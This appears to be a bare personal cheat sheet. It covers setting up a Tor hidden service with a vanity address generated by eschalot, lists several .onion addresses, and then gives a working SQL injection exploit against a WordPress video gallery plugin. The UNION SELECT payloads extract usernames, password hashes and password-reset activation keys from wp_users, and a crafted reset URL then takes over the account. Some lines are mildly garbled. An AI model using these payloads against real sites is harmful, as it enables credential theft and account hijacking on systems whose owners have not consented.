torrc

sudo apt-get install tor
whereis tor
cd /etc/tor
nano torrc
remove the "#"
HiddenServicePort 80 127.0.0.1:80
HiddenServicePort 80 127.0.0.1:8080
sudo tor
cd /var/lib/tor/hidden_service
cat hostname
git clone https://github.com/ReclaimYourPrivacy/eschalot
cd /eschalot
make
./eschalot -vct4 -p null
cd /var/lib/tor/hidden_service/
rm hostname
cat > private_key
"-----BEGIN RSA PRIVATE KEY-----" and ending with "-----END RSA PRIVATE KEY-----."
cat > private_key
cat hostname

3g2upl4pq6kufc4m.onion 	
qzbkwswfv5k2oj5d.onion 
zqktlwi4fecvo6ri.onion
cryjabkbdljzohnp.onion
http://files.fb.com/

-1 union Select 1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users
"SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE id=".$_pid
http://{Domain_Name_Here}/wp-content/plugins/all-video-gallery/config.php?vid=1&amp;pid=11&amp;pid={union Query here}
"SELECT * FROM ".$wpdb->;prefix."allvideogallery_profiles WHERE id=-1 union Select 1,2,3,4,5,6,group_concat(user_login,0xa,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users
-1 union Select 1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users
http://{DOMAIN_NAME_HERE}/wp-login.php?action=rp&key={ACTIVATION_KEY_HERE}&login={USERNAME_HERE}	  